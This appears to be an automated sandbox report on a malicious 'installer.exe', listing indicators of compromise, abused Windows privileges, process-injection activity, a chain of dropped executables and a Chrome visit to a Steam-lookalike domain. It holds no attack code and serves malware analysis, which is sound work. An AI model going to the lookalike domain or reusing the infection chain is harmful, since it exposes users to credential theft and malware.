fa0a452fa2f0f2 installer.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 353 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 416 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 866 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 278 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
chrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exechrome.exeGoogleUpdate.exeGoogleUpdate.exechrome.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exechrome.exechrome.exechrome.exechrome.exeFri142dfd92e4.exepowershell.exekeygen-step-1.exepid process 3532 chrome.exe 3532 chrome.exe 1828 chrome.exe 1828 chrome.exe 1336 chrome.exe 1336 chrome.exe 3692 chrome.exe 3692 chrome.exe 4524 chrome.exe 4524 chrome.exe 4664 chrome.exe 4664 chrome.exe 4816 chrome.exe 4816 chrome.exe 4764 chrome.exe 4764 chrome.exe 3728 chrome.exe 3728 chrome.exe 4180 GoogleUpdate.exe 4180 GoogleUpdate.exe 4180 GoogleUpdate.exe 4180 GoogleUpdate.exe 4180 GoogleUpdate.exe 4180 GoogleUpdate.exe 4180 GoogleUpdate.exe 4180 GoogleUpdate.exe 4180 GoogleUpdate.exe 4180 GoogleUpdate.exe 4584 GoogleUpdate.exe 4584 GoogleUpdate.exe 4228 chrome.exe 4228 chrome.exe 4228 chrome.exe 4228 chrome.exe 4920 GoogleUpdate.exe 4920 GoogleUpdate.exe 2812 GoogleUpdate.exe 2812 GoogleUpdate.exe 4472 GoogleUpdate.exe 4472 GoogleUpdate.exe 4588 GoogleUpdate.exe 4588 GoogleUpdate.exe 4588 GoogleUpdate.exe 4588 GoogleUpdate.exe 4588 GoogleUpdate.exe 4588 GoogleUpdate.exe 4536 GoogleUpdate.exe 4536 GoogleUpdate.exe 1676 chrome.exe 1676 chrome.exe 3008 chrome.exe 3008 chrome.exe 3692 chrome.exe 3692 chrome.exe 2412 chrome.exe 2412 chrome.exe 4468 Fri142dfd92e4.exe 4468 Fri142dfd92e4.exe 1380 powershell.exe 1380 powershell.exe 1380 powershell.exe 1380 powershell.exe 5388 keygen-step-1.exe 5388 keygen-step-1.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 2972 -
Suspicious behavior: MapViewOfSection 16 IoCs
Processes:
Fri140d16d9a199.exe5QdXYw7rNlVD7vtMvDqPvns3.exeTqhsT9nmJmEeKVXH993sOyjd.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exebdbwwjcpid process 4900 Fri140d16d9a199.exe 8304 5QdXYw7rNlVD7vtMvDqPvns3.exe 9256 TqhsT9nmJmEeKVXH993sOyjd.exe 9692 MicrosoftEdgeCP.exe 9692 MicrosoftEdgeCP.exe 9692 MicrosoftEdgeCP.exe 9692 MicrosoftEdgeCP.exe 11128 MicrosoftEdgeCP.exe 11128 MicrosoftEdgeCP.exe 7636 MicrosoftEdgeCP.exe 7636 MicrosoftEdgeCP.exe 7636 MicrosoftEdgeCP.exe 7636 MicrosoftEdgeCP.exe 7636 MicrosoftEdgeCP.exe 7636 MicrosoftEdgeCP.exe 516 bdbwwjc -
Suspicious behavior: SetClipboardViewer 3 IoCs
Processes:
3962436.scr4023738.scr8413030.scrpid process 5776 3962436.scr 4532 4023738.scr 8984 8413030.scr -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
GoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleCrashHandler.exeGoogleCrashHandler64.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeFri14bdb9bff7a.exeConhost.exeFri14be73761748f9bd.exepowershell.exeDownFlSetup110.exeShadowVPNInstaller_t3.exeFri142dfd92e4.exe6054293.scrforfiles.exepowershell.EXEdescription pid process Token: SeDebugPrivilege 4180 GoogleUpdate.exe Token: SeDebugPrivilege 4180 GoogleUpdate.exe Token: SeDebugPrivilege 4180 GoogleUpdate.exe Token: SeDebugPrivilege 4180 GoogleUpdate.exe Token: SeDebugPrivilege 4584 GoogleUpdate.exe Token: SeDebugPrivilege 4920 GoogleUpdate.exe Token: SeDebugPrivilege 2812 GoogleUpdate.exe Token: 33 4504 GoogleCrashHandler.exe Token: SeIncBasePriorityPrivilege 4504 GoogleCrashHandler.exe Token: 33 4552 GoogleCrashHandler64.exe Token: SeIncBasePriorityPrivilege 4552 GoogleCrashHandler64.exe Token: SeDebugPrivilege 4472 GoogleUpdate.exe Token: SeDebugPrivilege 4588 GoogleUpdate.exe Token: SeDebugPrivilege 4588 GoogleUpdate.exe Token: SeDebugPrivilege 4588 GoogleUpdate.exe Token: SeDebugPrivilege 4536 GoogleUpdate.exe Token: SeCreateTokenPrivilege 1092 Fri14bdb9bff7a.exe Token: SeAssignPrimaryTokenPrivilege 1092 Fri14bdb9bff7a.exe Token: SeLockMemoryPrivilege 1092 Fri14bdb9bff7a.exe Token: SeIncreaseQuotaPrivilege 1092 Fri14bdb9bff7a.exe Token: SeMachineAccountPrivilege 1092 Fri14bdb9bff7a.exe Token: SeTcbPrivilege 1092 Fri14bdb9bff7a.exe Token: SeSecurityPrivilege 1092 Fri14bdb9bff7a.exe Token: SeTakeOwnershipPrivilege 1092 Fri14bdb9bff7a.exe Token: SeLoadDriverPrivilege 1092 Fri14bdb9bff7a.exe Token: SeSystemProfilePrivilege 1092 Fri14bdb9bff7a.exe Token: SeSystemtimePrivilege 1092 Fri14bdb9bff7a.exe Token: SeProfSingleProcessPrivilege 1092 Fri14bdb9bff7a.exe Token: SeIncBasePriorityPrivilege 1092 Fri14bdb9bff7a.exe Token: SeCreatePagefilePrivilege 1092 Fri14bdb9bff7a.exe Token: SeCreatePermanentPrivilege 1092 Fri14bdb9bff7a.exe Token: SeBackupPrivilege 1092 Fri14bdb9bff7a.exe Token: SeRestorePrivilege 1092 Fri14bdb9bff7a.exe Token: SeShutdownPrivilege 1092 Fri14bdb9bff7a.exe Token: SeDebugPrivilege 1092 Fri14bdb9bff7a.exe Token: SeAuditPrivilege 1092 Fri14bdb9bff7a.exe Token: SeSystemEnvironmentPrivilege 1092 Fri14bdb9bff7a.exe Token: SeChangeNotifyPrivilege 1092 Fri14bdb9bff7a.exe Token: SeRemoteShutdownPrivilege 1092 Fri14bdb9bff7a.exe Token: SeUndockPrivilege 1092 Fri14bdb9bff7a.exe Token: SeSyncAgentPrivilege 1092 Fri14bdb9bff7a.exe Token: SeEnableDelegationPrivilege 1092 Fri14bdb9bff7a.exe Token: SeManageVolumePrivilege 1092 Fri14bdb9bff7a.exe Token: SeImpersonatePrivilege 1092 Fri14bdb9bff7a.exe Token: SeCreateGlobalPrivilege 1092 Fri14bdb9bff7a.exe Token: 31 1092 Fri14bdb9bff7a.exe Token: 32 1092 Fri14bdb9bff7a.exe Token: 33 1092 Fri14bdb9bff7a.exe Token: 34 1092 Fri14bdb9bff7a.exe Token: 35 1092 Fri14bdb9bff7a.exe Token: SeDebugPrivilege 2820 Conhost.exe Token: SeDebugPrivilege 4292 Fri14be73761748f9bd.exe Token: SeDebugPrivilege 1380 powershell.exe Token: SeDebugPrivilege 5796 Token: SeDebugPrivilege 4380 DownFlSetup110.exe Token: SeIncBasePriorityPrivilege 6108 ShadowVPNInstaller_t3.exe Token: SeDebugPrivilege 6108 ShadowVPNInstaller_t3.exe Token: SeLoadDriverPrivilege 6108 ShadowVPNInstaller_t3.exe Token: SeDebugPrivilege 4468 Fri142dfd92e4.exe Token: SeDebugPrivilege 5748 6054293.scr Token: SeRestorePrivilege 6272 forfiles.exe Token: SeBackupPrivilege 6272 forfiles.exe Token: SeBackupPrivilege 6272 forfiles.exe Token: SeDebugPrivilege 6328 powershell.EXE -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exepid process 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
chrome.exechrome.exepid process 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 1828 chrome.exe 3456 chrome.exe 3456 chrome.exe 3456 chrome.exe 3456 chrome.exe 3456 chrome.exe 3456 chrome.exe 3456 chrome.exe 3456 chrome.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
Processes:
chrome.exesetup_x86_x64_install.exesetup_installer.exesetup_install.exeFri14324d712c5d54d4.exeFri141d31513022.exeFri14def89ebdce1.exeFri14bdb9bff7a.exeFri1427fb5c3d61d6.exeFri141d31513022.tmpinst001.exechrome.exesfx_123_206.exeforfiles.exesetup_2.tmpjhuuee.exeShadowVPNInstaller_t3.exesetup_2.exexiuyingzhang-game.exesetup_2.tmpultramediaburner.exeultramediaburner.tmppostback.exeLzmwAqmV.exeinstaller.exeinstaller.tmpMicrosoftEdge.exeany.exeautosubplayer.exeMicrosoftEdgeCP.exeConhost.exeT2TE7fNo6bWqIPl9LTJ6doN7.exesqtvvs.exe8IGE4gE886DTVqb3s53q0cf7.execmd.exeConhost.exeBheF7ol5r_t3Ssw6RHDGjxZj.exek7pzcJTPzykV4PrUTt_7f0NP.exeRuqSfrFVBSVnyXlwoHTYRa8e.exeSsz7olZS8Vx29CqyZyE8bW4Y.exesdkuibuilder.exeInstall.exeInstall.exefirefox.exefirefox.exe35NQzL1aUT3nu0pxZmWjHnLT.exeWCmazA_xISA1qNzCaaRnLi6O.exeK_MyYiN18aWCXexZrRX5kwmL.exeUPmN2GnAv_fT2qkoZuZrCqNC.exeInstall.exeInstall.exeaIdDvwgbiTJCwnUi9OM7f3Nv.exe2EED.exeany.exeMicrosoftEdge.exeautosubplayer.exeMicrosoftEdgeCP.exeMicrosoftEdge.exepid process 1828 chrome.exe 1828 chrome.exe 4280 setup_x86_x64_install.exe 4196 setup_installer.exe 4472 setup_install.exe 4424 940 Fri14324d712c5d54d4.exe 4072 Fri141d31513022.exe 3000 Fri14def89ebdce1.exe 1092 Fri14bdb9bff7a.exe 3504 Fri1427fb5c3d61d6.exe 4260 Fri141d31513022.tmp 4560 inst001.exe 6204 chrome.exe 6392 sfx_123_206.exe 6452 forfiles.exe 6592 setup_2.tmp 6600 jhuuee.exe 6108 ShadowVPNInstaller_t3.exe 6988 setup_2.exe 6724 xiuyingzhang-game.exe 7084 setup_2.tmp 6316 ultramediaburner.exe 4908 ultramediaburner.tmp 7020 postback.exe 5928 LzmwAqmV.exe 7580 installer.exe 7876 installer.tmp 2972 4264 MicrosoftEdge.exe 9088 any.exe 4244 autosubplayer.exe 8504 MicrosoftEdgeCP.exe 6516 Conhost.exe 7344 T2TE7fNo6bWqIPl9LTJ6doN7.exe 8360 sqtvvs.exe 820 8IGE4gE886DTVqb3s53q0cf7.exe 9092 cmd.exe 6684 Conhost.exe 7768 BheF7ol5r_t3Ssw6RHDGjxZj.exe 7432 k7pzcJTPzykV4PrUTt_7f0NP.exe 9168 RuqSfrFVBSVnyXlwoHTYRa8e.exe 3340 Ssz7olZS8Vx29CqyZyE8bW4Y.exe 4540 sdkuibuilder.exe 4552 Install.exe 5224 Install.exe 9080 firefox.exe 8932 firefox.exe 4604 35NQzL1aUT3nu0pxZmWjHnLT.exe 7196 WCmazA_xISA1qNzCaaRnLi6O.exe 4120 K_MyYiN18aWCXexZrRX5kwmL.exe 9092 cmd.exe 9440 UPmN2GnAv_fT2qkoZuZrCqNC.exe 9640 Install.exe 9880 Install.exe 9928 aIdDvwgbiTJCwnUi9OM7f3Nv.exe 9992 2EED.exe 10476 any.exe 6560 MicrosoftEdge.exe 196 autosubplayer.exe 9692 MicrosoftEdgeCP.exe 9692 MicrosoftEdgeCP.exe 2972 10924 MicrosoftEdge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
chrome.exedescription pid process target process PID 1828 wrote to memory of 1964 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 1964 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 2800 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 3532 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 3532 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe PID 1828 wrote to memory of 996 1828 chrome.exe chrome.exe
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Winmgmt1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://steamcornminuty.com/id/andreasn1xet1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7fff9dd54f50,0x7fff9dd54f60,0x7fff9dd54f702⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1524 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1740 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2380 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2844 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4112 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4552 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4760 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4848 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4876 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5040 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5040 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4988 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4972 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5188 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4856 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5180 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5420 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4988 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5220 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe" --reenable-autoupdates --system-level2⤵
-
C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x240,0x244,0x248,0x21c,0x24c,0x7ff6756ba890,0x7ff6756ba8a0,0x7ff6756ba8b03⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5228 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,109201870909186107,17871508554707447892,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:12⤵
-
